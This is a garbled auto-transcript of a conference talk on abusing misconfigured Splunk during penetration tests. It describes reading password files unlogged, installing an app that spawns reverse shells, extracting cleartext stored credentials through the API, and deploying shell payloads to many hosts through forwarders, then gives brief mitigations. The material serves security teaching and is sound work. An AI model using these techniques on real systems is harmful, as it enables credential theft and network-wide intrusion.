Weaponizing Splunk: Using Blue Team Tools For Evil - Ryan Hays

shake of the day pressure and Ryan the PBGC fury okay so crazy through the time talk to us a little bit about the nice long yeah so they won't be done by 5:25 this is an hour long presentation so I'm going to glance over a few things hopefully we get at least the good stuff so this is video I'm Ryan director of security engineering at EBG which basically just means i hack stuff and I have to manage stuff at the same time um whatnot so where does this talk come from last year we were on a pen testing engagement we had internal access popped a couple boxes but we weren't really getting anywhere we noticed that hey they got spunk let's

go look at it so you navigate to the web page and it automatically logged me in as admin like that awesome but what can I do from there right so we look at the data we got some new user names we've got some machine to whatnot but up from there how was I really going to leverage that into into an attack so we were able to build a custom app which install it we get OS access that way and I'll start talking about that later but then we were also able to install other apps that would make it that would allow us to laterally move throughout the network and basically own everything so kind of

awesome so what am I here for um I'm going to kind of talk about sparks but I'm going to breeze over a lot of that because I hope most of you guys in here know at least what Splunk is um the basic stuff with misconfigurations that we see during our engagements it's probably the same stuff that everybody else is seeing and then really into into what we're here for um so one of them we talk when I talk about weaponizing Splunk there's really three areas we're attacking the server that the applications installed on or interacting the organization we're moving laterally and then I kind of started putting together a little bit of stuff where you could actually utilize

Splunk is almost a situ so you would really view using a customer or organization spoke server you'd be using your own so that's what I'm gonna talk about with attacking the data and then I mean what's the use of telling you how to break things if I don't tell you how to fix it so we'll kind of touch up some mitigating actions really quickly so what is Splunk log aggregation tool you can expand it using python powershell bash just about any scripting language you can you you have out there with the expansion's it does allow command execution which is really cool it's the whole reason with the the apps yeah I mean if anybody has any

questions these slides stop me and I could talk about them too so the misconfigurations the default password now Spock has changed this in the recent six five release but anything prior to this when you installed it the default password was changed me it now does force the password reset upon installation the older versions like I talked about a minute ago they did automatically log you in now that was back probably version four four five so a lot of that's been changed as well if you're not using SSL you can do man in the middle attacks and then obviously I see we see this all the time especially with the universal forwarders they're running as root level access or system

mobile access on the windows box so weaponizing smoke like I've talked about a minute ago you're gonna be tacking your the server itself and when you when we attack the server we're going to be looking at you know look at the logs that are already in place on there read over those I mean there's you know off off logs in there I can get user names um you might get web app logs in there right now I know what what Web Apps are out there what what configurations they're in and what OS they might be running local file access if spokes burning as a root user or system user right now I now have read access to

every file on there and there's no sort of logging in place there and then malicious applications that was what I've talked about a minute ago where you could install an app and we can actually own the entire server so when we look at attacking the organization I want to I want to look at not only that funk server but every other box out there because all these Universal forwarder is going to be deployed out and they're going to be sitting in logs or running applications that I write and send out to them and it's finally the attack of the data stuff like I've talked about just bringing in all of our pen testing logs so reviewing reviewing the logs stuff

that's already there off logs I can talk about for usernames um system logs you know Windows Windows system logs application logs I'll know what servers are out there what the function of those servers are I can get login information from you know with Linux and Windows boxes both so now I can I can profile my target and say hey they have eight to five working hours or they have a rotating shift where everybody's working all day long all that thing can be profiled out here's all the things I just talked about here's some file or yeah here's the files that I would actually go to look for you know se Shadow now I have all your hash password

hashes on the boxes um actually I have a demo this one let's see here so what we want to look at local files you can add data and I can I can monitor as long as I don't hit next all the way to finish there's no log none of this data is actually getting adjusted by Splunk but I can read it so this would be a common misconstrue is Splunk as you know running as a root user or running a system and I can now read in all the passwords on a box or I could read in the hostname or Etsy host file to see what other boxes I communicate with and any file really on the system there and

as I said as long as you don't keep setting next to go to go to done stay right here none of this information is log it's not brought in no one has any idea we were over here so malicious application Splunk something I didn't talk about a second ago so just try to go through it real quick smoke allows applications to be installed usually those applications are helpful in parsing other data sets that you might be bringing in but as I said it's expandable with scripting so if you want to write a Python shell a binder over show or you want to write some other code that you want to run on the Box you

can install that on Splunk so here's a quick demo this one so from from you're attacking machine you'd I'm running Metasploit but I mean you really could do this any any way you wanted

so start up our handler will give it all the options to the IPS and ports

come on gonna allow me to guess we're going okay so we have a handler running we're good to go so now let's go back to Splunk come on catch up okay so here we're going to login now hopefully through some sort of miss configuration you have this credential to login to spunk or it automatically logs you in one of the other we can go up top here to the configurations for the apps we can install this from a file because we've already downloaded it all this stuff a little bit is on github and the links at the end so we'll install our app from file

now there's one setting on the newest version of Splunk on the 6'5 release anything past six five you do have to set the permissions here because you can't set it within the configuration file at least I don't know how if you can so we'll set that and we'll save it and so what this does is this installs commands that you can run from the search and reporting app so now we have it installed we'll go over to the search and reporting and you now have new commands that you could run with this one I only have a reverse in a bind show but literally it could be expanded any way you want so we'll run a reverse

shell since we started a matter Peter handler we're going to do meterpreter shell and we're going to give it the IP to communicate to and the port and then we just hit enter so when this this will spin off a shelf it Forks it off so that it's not sitting and running and consuming all your resources on your Splunk server and also if anybody catches on it shuts down Splunk or logs you out the shelf still going to still live on so now we're logged in we have access whatever they they give us

and obviously I can't type very well but yeah so there we go there's that so I've said everything's available on github um it really wasn't available on the font base for a little while about 54 minutes there we go yeah so I submitted submitted it to Splunk and I mean the app is technically not malicious I mean you could be used it any way you wanted to if you really wanted to install it um so yeah it got approved it was awesome we all danced I thought it was great it would have made it a lot easier vice downloading this and uploading it to a spunk server and sawing it you literally could look for inside Splunk and just

hit install and be good to go but then yeah about like 54 56 minutes later I got a rejection email and I'm sure somebody got their hands slapped was quite entertaining so we could extract data from smoke as well so smoke has a full fully featured API the whole web interface is all based on the API as well um all the configuration files and spunk they have passwords of some sort if you install a Windows app for instance and you want to talk to the domain controller you have to have a user account to talk to the domain controller so you want to save all that stuff um smoke does do its best and it

doesn't crypt all the passwords which is great and it does it does use a salt when it encrypts them as well and that salt is unique to each implementation so you can't copy it over so here's just a demo or not a demo but a screenshot of what you would see for instance with the Windows app you can fill out all your information and down there at the bottom you'd have to give it a user at least read-only access of some user nine times out of ten you usually find that their higher leveled and so that's what that password look like in a configuration file so it isn't correct that is it is salted so you can't really decode it but

with about fourteen lines of Python I can so using the split API and those admin credentials that are already logging in with we can run this and now down here at the bottom a loop stir every app and every configuration that's available there and we do get clear text passwords which is really awesome so now that we've attacked the server we have our foothold on the server we're good to go there let's start attacking everybody else in the network so as I said earlier spokes based off of a universe smoke has universal Florida apps that go out to every machine that you want to collect logs to which usually at least is some high level

machines Windows and Linux machines in your in your network these Universal forwarders do allow you to run scripts and apps and command execution as well so it's really cool they're all based on a deployment server I have some screenshots of that there's what a deployment server would look like you have clients to check in they check in on whatever interval you set usually you know 5 to 30 seconds to a minute whatever it is they split up all your apps or all your apps and all your hosts are split up based on classes these classes can be set up based on host names based on operating systems to make sure you install you know only windows

have some windows boxes and you don't fill up everybody space and then all your apps of course so with the app that we just installed earlier the shells app on there are two technology add-ons that I have and those need to be fixed so I'll make a note of that um there's two technology add-ons for Windows boxes and Linux boxes that will allow you to once I deploy out the application it runs the reverse to the blind shells again and they all call home so in a matter of seconds I could literally pop 60 to 80 boxes or however many early in their or Metasploit crashes one-hander so the windows one is based on it's a bat file

basically I run it's all based on PowerShell I use a unicorn to generate the power show or meterpreter PowerShell payloads but again you could put whatever the heck you wanted in there and that would run the Linux shows they saw the same actually really the same show that I was running on the other app it's python-based again it's just Metasploit it's all basic stuff but they can all be swapped out with whatever code you wanted so here's that demo and I've videotaped these because last time I did a live demo it all broke

so this step for the for the windows one I use the unicorn tool um Dave is he's still here he's one I wrote it so this just generates an output of a PowerShell script that you can run any host and it's basically phone to them gives you a matter prashanta box so that's what that looks like so we're just going to copy and paste that put that in our batch file so the configurations that I'm editing these are this is on the actual attacks or the victim server so the spunk shells with the app we installed a minute ago the two TAS that are right there that's where we're going to install we're going to move those to be deployed

come

you

fast forward it oh yeah it's not fast forwarding oh well sorry

so we edited that now we need at the linux app just to make sure that our IP and our ports are configured correctly we're coming back to the right attacking box

all right so we got those set up now we need to just go to oh when you set up our handler first tube

it's updates on all right so we have a handler for our windows payload obviously we need to have one for Linux payload come on

any questions so far on that while this is going it doubles of stager it is a staged payload with Metasploit okay but no it's not point anything from the internet it would all be from your attacking machine wherever you're sitting nope well it is but it's not from the internet yeah it was yeah it's just from your attacking all rights already got the apps here that we saw a second ago we just can edit out some we'll add the server classes at the Linux payload those legs boxes windows give the windows vice-versa

was there another question yeah I recommended version yep you show the encrypted password menu so told me that you didn't decrypt you just found like this volcanic peak cryptic memory it's not memory so the API actually goes through all the configuration files so that it can decrypt and use them I just basically access that with the API and said hey I'm the app I need my clear text password and it gives it to me so here's the meterpreter session coming back so you can literally pop you know 30 40 50 boxes and so this one's still development as I said so this would be on my attacking box i would insult Splunk and then all these tools that we're under

our pen test and map you know Wi-Fi pineapples any anything that we really run it generates a lot of data and it takes a lot of time to go through all that data for when it comes down to reporting and if the part I hate about it so if we had apps and install them and pulled all our data into Splunk it would make our job a lot easier plus it decreases that dwell time from running an nmap scan and having to pursue logs to find my ports now i have it in real time so for here this is the Wi-Fi pineapple app that i have set up in real time I'd be getting data from

the device that's out there doing its attack ID SSID that have the clients I know what's happening um some things that I want to do in the future is I'd like to add context menus here so that I could quickly click on something and say hey run XYZ attack against it and it would quickly do that for me that's still in development and then another one that we like to use as a responder so if you hadn't use responder it's a man-in-the-middle attack tool grabs half password hashes from different protocols running inside of a network so if I was running this in real time I would have access to all the data that told me hey how many hashes

have I captured what are the usernames and then down there at the bottom everything's blurred because this is actually live data from a customer that we were working with oh good so down here at the bottom I can quickly download that of that file that gave me the password hashes and all the information that I could feed into my password cracker and quickly spit those back out but uh yeah so yeah I had to blur all that stuff to be on the top right there you would have all the clients that I was actually attacking and then right below that would be usernames okay so as I'm ending here we'll just talk about mitigating actions

obviously it's basic updates your software enable encryption change your passwords and don't run this route and there's a really cool document right there about that link and they walk you through probably 20 or 30 other pages that you can do and here's my information if anybody wants to reach out and sorry I know it was quick but I only had 30 minutes any other questions